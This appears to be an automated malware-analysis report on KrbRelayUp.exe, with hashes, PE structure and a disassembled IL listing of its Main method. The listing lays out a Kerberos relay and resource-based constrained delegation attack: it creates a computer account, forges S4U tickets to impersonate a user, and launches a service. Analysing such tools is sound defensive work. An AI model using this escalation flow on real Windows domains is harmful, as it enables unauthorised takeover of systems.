Suspicious
Suspect

6b6ee63e1b57405281275a7bcfba6f91

PE Executable | MD5: 6b6ee63e1b57405281275a7bcfba6f91 | Size: 1.11 MB | application/x-dosexec


Characteristics

Symbol Obfuscation Score: Medium

Hash
MD5: 6b6ee63e1b57405281275a7bcfba6f91
SHA1: 8b4e7306a489827edf13be549ce5649abe15ade8
SHA256: a84d2731983b2f9765bdc2048d1108aa69c7d926bbb57a6cea60de7d3002de1b
SHA384: 168735e3befb776606b1c7c9a1f60e07fc06f829925a0babd393c476a39248d8f2e8c8482e4a6a9b5460abffc644d01e
SHA512: 7be9182a5c2f9aedbbac5ca8e5a0f214d782523cd9d31e8428ae0a7d002ba163f9075a8b1382ccad1869cedbb897e81d1cfe8048ea890d9fc2b537f3a691bb9b
SSDeep: 24576:/Ud4OjAlC+9nHLmX63wZSGBI/u0+eW81ATw89rgX6BCYICX:/mHsl99nrmXOFp/HJW8ilIC
TLSH: 9235D02437E88F1BE5AE0735F071151507F2F422A672E79F6A81D0AA2E83751ED10BB7

PeID

.NET executable
Microsoft Visual C# / Basic .NET
Microsoft Visual C# / Basic.NET / MS Visual Basic 2005 - ASL
Microsoft Visual C# v7.0 / Basic .NET
Microsoft Visual Studio .NET
UPolyX 0.3 -> delikon
File Structure
Structure
DosHeader
PE Header
Optional Header (x86)
Section Headers
.text
.rsrc
.reloc
Resources
RT_VERSION
ID:0001
ID:0
RT_MANIFEST
ID:0001
ID:0
.Net Resources
KrbRelayUp.DSInternals.Common.Properties.Resources.resources
bouncycastle.crypto
Information
Info: PE Detect: PeReader OK (file layout)
Module Name: KrbRelayUp.exe
Full Name: KrbRelayUp.exe
EntryPoint: System.Void KrbRelayUp.Program::Main(System.String[])
Scope Name: KrbRelayUp.exe
Scope Type: ModuleDef
Kind: Console
Runtime Version: v4.0.30319
Tables Header Version: 512
WinMD Version: <null>
Assembly Name: KrbRelayUp
Assembly Version: 0.0.0.0
Assembly Culture: <null>
Has PublicKey: False
PublicKey Token: <null>
Target Framework: .NETFramework,Version=v4.7.2
Total Strings: 1250
Main Method: System.Void KrbRelayUp.Program::Main(System.String[])
Main IL Instruction Count: 658

Main IL


System.DirectoryServices.Protocols.DirectoryConnection::SendRequest(System.DirectoryServices.Protocols.DirectoryRequest) pop <null> ldc.i4.5 <null> newarr System.String dup <null> ldc.i4.0 <null> ldstr [+] Computer account " stelem.ref <null> dup <null> ldc.i4.1 <null> ldsfld System.String KrbRelayUp.Options::rbcdComputerName stelem.ref <null> dup <null> ldc.i4.2 <null> ldstr $" added with password " stelem.ref <null> dup <null> ldc.i4.3 <null> ldsfld System.String KrbRelayUp.Options::rbcdComputerPassword stelem.ref <null> dup <null> ldc.i4.4 <null> ldstr " stelem.ref <null> call System.String System.String::Concat(System.String[]) call System.Void System.Console::WriteLine(System.String) leave.s IL_031B: ldloc.0 stloc.2 <null> ldstr [-] Could not add new computer account: call System.Void System.Console::WriteLine(System.String) ldstr [-] ldloc.2 <null> callvirt System.String System.Exception::get_Message() call System.String System.String::Concat(System.String,System.String) call System.Void System.Console::WriteLine(System.String) leave IL_07BF: ret ldloc.0 <null> ldsfld System.String KrbRelayUp.Options::rbcdComputerName ldsfld System.String KrbRelayUp.Options::domainDN call System.String KrbRelayUp.Program::GetObjectSidForComputerName(System.DirectoryServices.Protocols.LdapConnection,System.String,System.String) stsfld System.String KrbRelayUp.Options::rbcdComputerSid call System.Void KrbRelayUp.Relay.Relay::Run() ldsfld KrbRelayUp.Options/PhaseType KrbRelayUp.Options::phase ldc.i4.2 <null> beq.s IL_0352: ldnull ldsfld KrbRelayUp.Options/PhaseType KrbRelayUp.Options::phase ldc.i4.4 <null> bne.un IL_07BF: ret ldsfld System.Boolean KrbRelayUp.Options::attackDone brfalse IL_07BF: ret ldnull <null> stloc.3 <null> ldsfld KrbRelayUp.Relay.RelayAttackType KrbRelayUp.Options::relayAttackType ldc.i4.1 <null> bne.un IL_0581: ldsfld KrbRelayUp.Relay.RelayAttackType KrbRelayUp.Options::relayAttackType ldc.i4.0 <null> stloc.s V_4 ldnull <null> stloc.s V_5 ldsfld 
System.String KrbRelayUp.Options::rbcdComputerPassword call System.Boolean System.String::IsNullOrEmpty(System.String) brtrue.s IL_03D0: ldsfld System.String KrbRelayUp.Options::rbcdComputerPasswordHash ldc.i4.5 <null> newarr System.String dup <null> ldc.i4.0 <null> ldsfld System.String KrbRelayUp.Options::domain callvirt System.String System.String::ToUpper() stelem.ref <null> dup <null> ldc.i4.1 <null> ldstr host stelem.ref <null> dup <null> ldc.i4.2 <null> ldsfld System.String KrbRelayUp.Options::rbcdComputerName callvirt System.String System.String::ToLower() stelem.ref <null> dup <null> ldc.i4.3 <null> ldstr . stelem.ref <null> dup <null> ldc.i4.4 <null> ldsfld System.String KrbRelayUp.Options::domain callvirt System.String System.String::ToLower() stelem.ref <null> call System.String System.String::Concat(System.String[]) stloc.s V_8 ldc.i4.s 18 ldsfld System.String KrbRelayUp.Options::rbcdComputerPassword ldloc.s V_8 ldc.i4 4096 call System.String KrbRelayUp.Crypto::KerberosPasswordHash(KrbRelayUp.Interop/KERB_ETYPE,System.String,System.String,System.Int32) stloc.s V_5 ldc.i4.s 18 stloc.s V_4 br.s IL_03E7: ldsfld System.String KrbRelayUp.Options::rbcdComputerName ldsfld System.String KrbRelayUp.Options::rbcdComputerPasswordHash call System.Boolean System.String::IsNullOrEmpty(System.String) brtrue.s IL_03E7: ldsfld System.String KrbRelayUp.Options::rbcdComputerName ldsfld System.String KrbRelayUp.Options::rbcdComputerPasswordHash stloc.s V_5 ldc.i4.s 23 stloc.s V_4 ldsfld System.String KrbRelayUp.Options::rbcdComputerName ldstr $ call System.String System.String::Concat(System.String,System.String) ldsfld System.String KrbRelayUp.Options::domain ldloc.s V_5 ldloc.s V_4 ldnull <null> ldc.i4.0 <null> ldstr ldloca.s V_9 initobj KrbRelayUp.lib.Interop.LUID ldloc.s V_9 ldc.i4.0 <null> ldc.i4.0 <null> ldstr ldc.i4.0 <null> ldc.i4.1 <null> ldnull <null> call System.Byte[] 
KrbRelayUp.AskTGT::TGT(System.String,System.String,System.String,KrbRelayUp.Interop/KERB_ETYPE,System.String,System.Boolean,System.String,KrbRelayUp.lib.Interop.LUID,System.Boolean,System.Boolean,System.String,System.Boolean,System.Boolean,System.String) newobj System.Void KrbRelayUp.KRB_CRED::.ctor(System.Byte[]) stloc.s V_6 ldsfld System.Boolean KrbRelayUp.Options::verbose brfalse.s IL_046C: ldloc.s V_6 ldc.i4.5 <null> newarr System.String dup <null> ldc.i4.0 <null> ldstr [+] VERBOSE: Base64 TGT for stelem.ref <null> dup <null> ldc.i4.1 <null> ldsfld System.String KrbRelayUp.Options::rbcdComputerName stelem.ref <null> dup <null> ldc.i4.2 <null> ldstr $: stelem.ref <null> dup <null> ldc.i4.3 <null> ldloc.s V_6 callvirt System.Byte[] KrbRelayUp.KRB_CRED::get_RawBytes() call System.String System.Convert::ToBase64String(System.Byte[]) stelem.ref <null> dup <null> ldc.i4.4 <null> ldstr stelem.ref <null> call System.String System.String::Concat(System.String[]) call System.Void System.Console::WriteLine(System.String) ldloc.s V_6 ldsfld System.String KrbRelayUp.Options::impersonateUser ldsfld System.String KrbRelayUp.Options::targetSPN ldnull <null> ldc.i4.0 <null> ldstr ldstr ldc.i4.0 <null> ldc.i4.0 <null> ldc.i4.0 <null> ldstr ldc.i4.s 65 ldnull <null> call KrbRelayUp.KRB_CRED KrbRelayUp.S4U::S4U2Self(KrbRelayUp.KRB_CRED,System.String,System.String,System.String,System.Boolean,System.String,System.String,System.Boolean,System.Boolean,System.Boolean,System.String,KrbRelayUp.Interop/KERB_ETYPE,System.String) stloc.s V_7 ldsfld System.Boolean KrbRelayUp.Options::verbose brfalse.s IL_0502: ldloc.s V_6 ldc.i4.s 9 newarr System.String dup <null> ldc.i4.0 <null> ldstr [+] VERBOSE: Base64 TGS for stelem.ref <null> dup <null> ldc.i4.1 <null> ldsfld System.String KrbRelayUp.Options::impersonateUser stelem.ref <null> dup <null> ldc.i4.2 <null> ldstr to stelem.ref <null> dup <null> ldc.i4.3 <null> ldsfld System.String KrbRelayUp.Options::rbcdComputerName stelem.ref <null> dup 
<null> ldc.i4.4 <null> ldstr $@ stelem.ref <null> dup <null> ldc.i4.5 <null> ldsfld System.String KrbRelayUp.Options::domain stelem.ref <null> dup <null> ldc.i4.6 <null> ldstr : stelem.ref <null> dup <null> ldc.i4.7 <null> ldloc.s V_7 callvirt Asn1.AsnElt KrbRelayUp.KRB_CRED::Encode() callvirt System.Byte[] Asn1.AsnElt::Encode() call System.String System.Convert::ToBase64String(System.Byte[]) stelem.ref <null> dup <null> ldc.i4.8 <null> ldstr stelem.ref <null> call System.String System.String::Concat(System.String[]) call System.Void System.Console::WriteLine(System.String) ldloc.s V_6 ldsfld System.String KrbRelayUp.Options::impersonateUser ldsfld System.String KrbRelayUp.Options::targetSPN ldnull <null> ldsfld KrbRelayUp.Options/PhaseType KrbRelayUp.Options::phase ldc.i4.4 <null> ceq <null> ldc.i4.0 <null> ceq <null> ldstr ldloc.s V_7 ldc.i4.0 <null> ldnull <null> call System.Byte[] KrbRelayUp.S4U::S4U2Proxy(KrbRelayUp.KRB_CRED,System.String,System.String,System.String,System.Boolean,System.String,KrbRelayUp.KRB_CRED,System.Boolean,System.String) stloc.3 <null> ldsfld System.Boolean KrbRelayUp.Options::verbose brfalse IL_0730: ldc.i4 1500 ldc.i4.7 <null> newarr System.String dup <null> ldc.i4.0 <null> ldstr [+] VERBOSE: Base64 TGS for stelem.ref <null> dup <null> ldc.i4.1 <null> ldsfld System.String KrbRelayUp.Options::impersonateUser stelem.ref <null> dup <null> ldc.i4.2 <null> ldstr to stelem.ref <null> dup <null> ldc.i4.3 <null> ldsfld System.String KrbRelayUp.Options::targetSPN stelem.ref <null> dup <null> ldc.i4.4 <null> ldstr : stelem.ref <null> dup <null> ldc.i4.5 <null> ldloc.3 <null> call System.String System.Convert::ToBase64String(System.Byte[]) stelem.ref <null> dup <null> ldc.i4.6 <null> ldstr stelem.ref <null> call System.String System.String::Concat(System.String[]) call System.Void System.Console::WriteLine(System.String) br IL_0730: ldc.i4 1500 ldsfld KrbRelayUp.Relay.RelayAttackType KrbRelayUp.Options::relayAttackType ldc.i4.2 <null> beq.s 
IL_0594: call System.String System.Environment::get_MachineName() ldsfld KrbRelayUp.Relay.RelayAttackType KrbRelayUp.Options::relayAttackType ldc.i4.3 <null> bne.un IL_0730: ldc.i4 1500 call System.String System.Environment::get_MachineName() ldstr $ call System.String System.String::Concat(System.String,System.String) ldsfld System.String KrbRelayUp.Options::domain ldsfld System.String KrbRelayUp.Options::shadowCredCertificate ldsfld System.String KrbRelayUp.Options::shadowCredCertificatePassword ldc.i4.s 18 ldnull <null> ldc.i4.0 <null> ldstr ldsfld System.Boolean KrbRelayUp.Options::verbose stloc.s V_12 ldloca.s V_9 initobj KrbRelayUp.lib.Interop.LUID ldloc.s V_9 ldc.i4.0 <null> ldc.i4.0 <null> ldstr ldloc.s V_12 ldnull <null> call System.Byte[] KrbRelayUp.AskTGT::TGT(System.String,System.String,System.String,System.String,KrbRelayUp.Interop/KERB_ETYPE,System.String,System.Boolean,System.String,KrbRelayUp.lib.Interop.LUID,System.Boolean,System.Boolean,System.String,System.Boolean,System.String) newobj System.Void KrbRelayUp.KRB_CRED::.ctor(System.Byte[]) stloc.s V_10 ldsfld System.Boolean KrbRelayUp.Options::verbose brfalse.s IL_0628: ldloc.s V_10 ldc.i4.5 <null> newarr System.String dup <null> ldc.i4.0 <null> ldstr [+] VERBOSE: Base64 TGT for stelem.ref <null> dup <null> ldc.i4.1 <null> call System.String System.Environment::get_MachineName() stelem.ref <null> dup <null> ldc.i4.2 <null> ldstr $: stelem.ref <null> dup <null> ldc.i4.3 <null> ldloc.s V_10 callvirt System.Byte[] KrbRelayUp.KRB_CRED::get_RawBytes() call System.String System.Convert::ToBase64String(System.Byte[]) stelem.ref <null> dup <null> ldc.i4.4 <null> ldstr stelem.ref <null> call System.String System.String::Concat(System.String[]) call System.Void System.Console::WriteLine(System.String) ldloc.s V_10 ldsfld System.String KrbRelayUp.Options::impersonateUser ldsfld System.String KrbRelayUp.Options::targetSPN ldnull <null> ldc.i4.0 <null> ldstr ldstr ldc.i4.0 <null> ldc.i4.0 <null> ldc.i4.0 
<null> ldstr ldc.i4.s 65 ldnull <null> call KrbRelayUp.KRB_CRED KrbRelayUp.S4U::S4U2Self(KrbRelayUp.KRB_CRED,System.String,System.String,System.String,System.Boolean,System.String,System.String,System.Boolean,System.Boolean,System.Boolean,System.String,KrbRelayUp.Interop/KERB_ETYPE,System.String) stloc.s V_11 ldsfld System.Boolean KrbRelayUp.Options::verbose brfalse.s IL_06BE: ldloc.s V_11 ldc.i4.s 9 newarr System.String dup <null> ldc.i4.0 <null> ldstr [+] VERBOSE: Base64 TGS for stelem.ref <null> dup <null> ldc.i4.1 <null> ldsfld System.String KrbRelayUp.Options::impersonateUser stelem.ref <null> dup <null> ldc.i4.2 <null> ldstr to stelem.ref <null> dup <null> ldc.i4.3 <null> ldsfld System.String KrbRelayUp.Options::rbcdComputerName stelem.ref <null> dup <null> ldc.i4.4 <null> ldstr $@ stelem.ref <null> dup <null> ldc.i4.5 <null> ldsfld System.String KrbRelayUp.Options::domain stelem.ref <null> dup <null> ldc.i4.6 <null> ldstr : stelem.ref <null> dup <null> ldc.i4.7 <null> ldloc.s V_11 callvirt Asn1.AsnElt KrbRelayUp.KRB_CRED::Encode() callvirt System.Byte[] Asn1.AsnElt::Encode() call System.String System.Convert::ToBase64String(System.Byte[]) stelem.ref <null> dup <null> ldc.i4.8 <null> ldstr stelem.ref <null> call System.String System.String::Concat(System.String[]) call System.Void System.Console::WriteLine(System.String) ldloc.s V_11 ldsfld System.String KrbRelayUp.Options::targetSPN ldsfld KrbRelayUp.Options/PhaseType KrbRelayUp.Options::phase ldc.i4.4 <null> ceq <null> ldc.i4.0 <null> ceq <null> ldloca.s V_9 initobj KrbRelayUp.lib.Interop.LUID ldloc.s V_9 call System.Byte[] KrbRelayUp.LSA::SubstituteTGSSname(KrbRelayUp.KRB_CRED,System.String,System.Boolean,KrbRelayUp.lib.Interop.LUID) stloc.3 <null> ldsfld System.Boolean KrbRelayUp.Options::verbose brfalse.s IL_0730: ldc.i4 1500 ldc.i4.7 <null> newarr System.String dup <null> ldc.i4.0 <null> ldstr [+] VERBOSE: Base64 TGS for stelem.ref <null> dup <null> ldc.i4.1 <null> ldsfld System.String 
KrbRelayUp.Options::impersonateUser stelem.ref <null> dup <null> ldc.i4.2 <null> ldstr to stelem.ref <null> dup <null> ldc.i4.3 <null> ldsfld System.String KrbRelayUp.Options::targetSPN stelem.ref <null> dup <null> ldc.i4.4 <null> ldstr : stelem.ref <null> dup <null> ldc.i4.5 <null> ldloc.3 <null> call System.String System.Convert::ToBase64String(System.Byte[]) stelem.ref <null> dup <null> ldc.i4.6 <null> ldstr stelem.ref <null> call System.String System.String::Concat(System.String[]) call System.Void System.Console::WriteLine(System.String) ldc.i4 1500 call System.Void System.Threading.Thread::Sleep(System.Int32) ldsfld KrbRelayUp.Options/PhaseType KrbRelayUp.Options::phase ldc.i4.4 <null> beq.s IL_0749: call System.Diagnostics.Process System.Diagnostics.Process::GetCurrentProcess() ldsfld System.Boolean KrbRelayUp.Options::useCreateNetOnly brfalse.s IL_07BA: call System.Void KrbRelayUp.KrbSCM::Run() call System.Diagnostics.Process System.Diagnostics.Process::GetCurrentProcess() callvirt System.Diagnostics.ProcessModule System.Diagnostics.Process::get_MainModule() callvirt System.String System.Diagnostics.ProcessModule::get_FileName() ldstr krbscm call System.String System.String::Concat(System.String,System.String) stloc.s V_13 ldsfld System.String KrbRelayUp.Options::serviceName call System.Boolean System.String::IsNullOrEmpty(System.String) brtrue.s IL_0788: ldsfld System.String KrbRelayUp.Options::serviceCommand ldloc.s V_13 ldstr --ServiceName " ldsfld System.String KrbRelayUp.Options::serviceName ldstr " call System.String System.String::Concat(System.String,System.String,System.String,System.String) stloc.s V_13 ldsfld System.String KrbRelayUp.Options::serviceCommand call System.Boolean System.String::IsNullOrEmpty(System.String) brtrue.s IL_07AC: ldloc.s V_13 ldloc.s V_13 ldstr --ServiceCommand " ldsfld System.String KrbRelayUp.Options::serviceCommand ldstr " call System.String System.String::Concat(System.String,System.String,System.String,System.String) 
stloc.s V_13 ldloc.s V_13 ldc.i4.0 <null> ldnull <null> ldnull <null> ldnull <null> ldloc.3 <null> call KrbRelayUp.lib.Interop.LUID KrbRelayUp.Helpers::CreateProcessNetOnly(System.String,System.Boolean,System.String,System.String,System.String,System.Byte[]) pop <null> ret <null> call System.Void KrbRelayUp.KrbSCM::Run() ret <null>
